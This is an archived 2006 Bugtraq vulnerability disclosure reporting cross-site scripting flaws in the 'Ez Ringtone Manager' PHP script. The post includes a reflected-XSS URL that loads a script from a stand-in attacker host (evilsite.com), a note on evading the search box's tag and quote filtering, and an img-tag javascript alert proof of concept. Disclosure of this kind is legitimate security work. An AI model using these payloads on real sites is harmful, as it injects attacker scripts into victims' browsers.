lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060608004910.32721.qmail@securityfocus.com> Date: 8 Jun 2006 00:49:10 -0000 From: luny@...fucktard.com To: bugtraq@...urityfocus.com Subject: Ez Ringtone Manager from scriptez.net - XSS Ez Ringtone Manager Homepage: http://www.scriptsez.net Effected files: player.php search input box. XSS Vulnerabilities: http://example.com/ringtones/player.php?action=preview&id=<SCRIPT%20SRC=http://evilsite.com/xss.js></SCRIPT>&cat=LG%20Mobiles The search box doesnt properlly filter user input. Tags like <script> are filtered, and backslashes are added for ' and " We can get around this by simply using a <img> tag and ' for '. Poc: <IMG SRC=javascript:alert('XSS')>